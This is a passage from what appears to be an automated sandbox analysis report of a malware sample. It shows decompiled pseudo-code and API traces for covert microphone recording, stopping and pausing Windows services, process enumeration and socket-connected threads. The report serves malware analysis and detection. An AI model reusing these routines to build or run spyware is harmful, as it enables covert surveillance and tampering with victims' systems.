                                                                                  • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                                                                  • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                                                                  • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                                                                • String ID:
                                                                                • API String ID: 573486607-0
                                                                                • Opcode ID: 77ddacf53b0e59390d1cd889b5acedb5f46201a6807b72dd8ddeb4db2a3f19ee
                                                                                • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                                                                • Opcode Fuzzy Hash: 77ddacf53b0e59390d1cd889b5acedb5f46201a6807b72dd8ddeb4db2a3f19ee
                                                                                • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 51%
                                                                                			E0040DBD7() {
                                                                                				char* _t7;
                                                                                				int _t8;
                                                                                				char* _t9;
                                                                                				int _t10;
                                                                                				char* _t11;
                                                                                				void* _t33;
                                                                                				void* _t40;
                                                                                
                                                                                				 *0x41b1f8 = 0;
                                                                                				_t7 = E0040180C(_t33 - 0x10, 0, 2);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t8 = atoi(_t7);
                                                                                				_t9 = E0040180C(_t33 - 0x10, 0, 1);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				_t10 = atoi(_t9);
                                                                                				_t11 = E0040180C(_t33 - 0x10, 0, 0);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				E004010CE(_t40, atoi(_t11), _t10, _t8);
                                                                                				E004017DD(_t33 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040DBEB
                                                                                • atoi.MSVCRT ref: 0040DBF8
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040DC08
                                                                                • atoi.MSVCRT ref: 0040DC0F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DC1E
                                                                                • atoi.MSVCRT ref: 0040DC25
                                                                                  • Part of subcall function 004010CE: _ftol.MSVCRT ref: 00401134
                                                                                  • Part of subcall function 004010CE: waveInOpen.WINMM(0041B198,000000FF,0041B218,0040122D,00000000,00030008), ref: 0040115E
                                                                                  • Part of subcall function 004010CE: waveInStart.WINMM ref: 00401177
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@atoi$??1?$basic_string@wave$OpenStart_ftol
                                                                                • String ID:
                                                                                • API String ID: 463581448-0
                                                                                • Opcode ID: 2200da0b70681f4d1c0250b84e4ec1b70157c7ac412cde7651218d3b94bdd8f3
                                                                                • Instruction ID: c3a8f3133f02346e86bcb6311be1634d36dcbe797283f91724418690e0411b93
                                                                                • Opcode Fuzzy Hash: 2200da0b70681f4d1c0250b84e4ec1b70157c7ac412cde7651218d3b94bdd8f3
                                                                                • Instruction Fuzzy Hash: 1D01FF72E00218DFDB04BBF1EC599ED7764EB90356B00483EE512E71E1EEB85904CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00411859(void* _a4) {
                                                                                				struct _SERVICE_STATUS _v32;
                                                                                				short* _t6;
                                                                                				signed int _t14;
                                                                                				void* _t17;
                                                                                				void* _t18;
                                                                                
                                                                                				_t14 = 0;
                                                                                				_t6 = OpenSCManagerW(0, 0, 0x40);
                                                                                				_t18 = _t6;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                                                                				if(_t17 != 0) {
                                                                                					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
                                                                                					CloseServiceHandle(_t18);
                                                                                					CloseServiceHandle(_t17);
                                                                                				} else {
                                                                                					CloseServiceHandle(_t18);
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t14;
                                                                                			}

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                                                                • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                                                                • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                                                                • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E004118C0(void* _a4) {
                                                                                				struct _SERVICE_STATUS _v32;
                                                                                				short* _t6;
                                                                                				signed int _t14;
                                                                                				void* _t17;
                                                                                				void* _t18;
                                                                                
                                                                                				_t14 = 0;
                                                                                				_t6 = OpenSCManagerW(0, 0, 0x40);
                                                                                				_t18 = _t6;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                                                                				if(_t17 != 0) {
                                                                                					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
                                                                                					CloseServiceHandle(_t18);
                                                                                					CloseServiceHandle(_t17);
                                                                                				} else {
                                                                                					CloseServiceHandle(_t18);
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t14;
                                                                                			}

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                                                                • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                                                                • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                                                                • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00411760(void* _a4) {
                                                                                				struct _SERVICE_STATUS _v32;
                                                                                				short* _t6;
                                                                                				signed int _t14;
                                                                                				void* _t17;
                                                                                				void* _t18;
                                                                                
                                                                                				_t14 = 0;
                                                                                				_t6 = OpenSCManagerW(0, 0, 0x20);
                                                                                				_t18 = _t6;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t17 = OpenServiceW(_t18, _t6, 0x20);
                                                                                				if(_t17 != 0) {
                                                                                					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
                                                                                					CloseServiceHandle(_t18);
                                                                                					CloseServiceHandle(_t17);
                                                                                				} else {
                                                                                					CloseServiceHandle(_t18);
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t14;
                                                                                			}

                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                                                                • String ID:
                                                                                • API String ID: 858787766-0
                                                                                • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                                                                • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                                                                • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                                                                • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 43%
                                                                                			E0040D761(void* __ecx, void* __eflags) {
                                                                                				void* _t15;
                                                                                				void* _t20;
                                                                                				void* _t30;
                                                                                				void* _t32;
                                                                                				void* _t34;
                                                                                				void* _t38;
                                                                                
                                                                                				_t38 = __eflags;
                                                                                				_t20 = __ecx;
                                                                                				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
                                                                                				_t15 = _t32 - 0x60;
                                                                                				L00414140();
                                                                                				L00414170();
                                                                                				E004020C2(0x41be70, 0x4f, _t34);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				E004017DD(_t32 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return 0;
                                                                                			}

                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                                                                • _itoa.MSVCRT ref: 0040D76E
                                                                                  • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                                                                  • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                                                                  • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                                                                  • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                                                                  • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                                                                  • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                                                                • String ID:
                                                                                • API String ID: 1707565870-0
                                                                                • Opcode ID: 5cbb7f8af44e19eeec85372959ad9ef19753e3bb0ef527fc91e73b5a23a7a717
                                                                                • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                                                                • Opcode Fuzzy Hash: 5cbb7f8af44e19eeec85372959ad9ef19753e3bb0ef527fc91e73b5a23a7a717
                                                                                • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E0041230A(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				char _v44;
                                                                                				char _v52;
                                                                                				char _v60;
                                                                                				char _v68;
                                                                                				char _v76;
                                                                                				char _v84;
                                                                                				void* _t39;
                                                                                				void* _t41;
                                                                                				void* _t45;
                                                                                				void* _t50;
                                                                                				void* _t54;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr* _t59;
                                                                                
                                                                                				_t56 = __edx;
                                                                                				_t54 = __ecx;
                                                                                				_t59 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                                                                                				 *_t59( &_v44,  &_v60,  &_v76);
                                                                                				Sleep(0x3e8);
                                                                                				 *_t59( &_v52,  &_v68,  &_v84);
                                                                                				_v28 = E004123EE(_t54,  &_v44);
                                                                                				_v24 = _t56;
                                                                                				_v20 = E004123EE(_t54,  &_v52);
                                                                                				_v16 = _t56;
                                                                                				_t39 = E004123EE(_t54,  &_v60);
                                                                                				_v32 = _t56;
                                                                                				_t41 = E004123EE(_t54,  &_v68);
                                                                                				_v12 = E004123EE(_t54,  &_v76);
                                                                                				asm("sbb edi, [ebp-0x1c]");
                                                                                				_v8 = _t56;
                                                                                				_v32 = _t56;
                                                                                				_t45 = E004123EE(_t54,  &_v84);
                                                                                				asm("sbb edi, [ebp-0x4]");
                                                                                				asm("sbb ecx, [ebp-0xc]");
                                                                                				asm("adc ecx, [ebp-0x1c]");
                                                                                				asm("adc ecx, [ebp-0x14]");
                                                                                				_t50 = E00413F70(_t45 - _v12 - _v20 + _t41 - _t39 + _v28, _t56, 0x64, 0);
                                                                                				asm("adc edi, [ebp-0x1c]");
                                                                                				return E00413F00(_t50, _t56, _t45 - _v12 + _t41 - _t39, _t56);
                                                                                			}

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00412324
                                                                                • Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                                                                • __aulldiv.LIBCMT ref: 004123E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcSleep__aulldiv
                                                                                • String ID: GetSystemTimes$kernel32.dll
                                                                                • API String ID: 482274533-1354958348
                                                                                • Opcode ID: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                                                                • Instruction ID: 24784d85835a85e8dafa53e59313101cf39276f4ebe332ff0eed9d8e085b34e9
                                                                                • Opcode Fuzzy Hash: 46a1d328fedf844ba606f0e8673ace6c540685b211b4bcf1c735d680270a1030
                                                                                • Instruction Fuzzy Hash: 9231CD72D0021DABCB10EBF5CD85DEFBBBCAE48714F04412AF515F3245D678A6498BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00410E53(void* __eflags, char _a4) {
                                                                                				char _v20;
                                                                                				char _v36;
                                                                                				char _v52;
                                                                                				void* _t16;
                                                                                				char* _t18;
                                                                                				void* _t19;
                                                                                				void* _t36;
                                                                                
                                                                                				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                                                                				E00402038(0x41c130);
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				E0040209B(0x41c130,  &_a4);
                                                                                				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
                                                                                				_t18 =  &_v20;
                                                                                				L00414140();
                                                                                				L00414140();
                                                                                				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				E00402118(0x41c130, E00410F04);
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return _t19;
                                                                                			}

                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                  • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                                                                  • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                                                                  • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@
                                                                                • String ID:
                                                                                • API String ID: 2196721692-0
                                                                                • Opcode ID: e139c00cd810f7f7f7039f085b2d95c45cf7812f598c374a546ffc2f4f333034
                                                                                • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                                                                • Opcode Fuzzy Hash: e139c00cd810f7f7f7039f085b2d95c45cf7812f598c374a546ffc2f4f333034
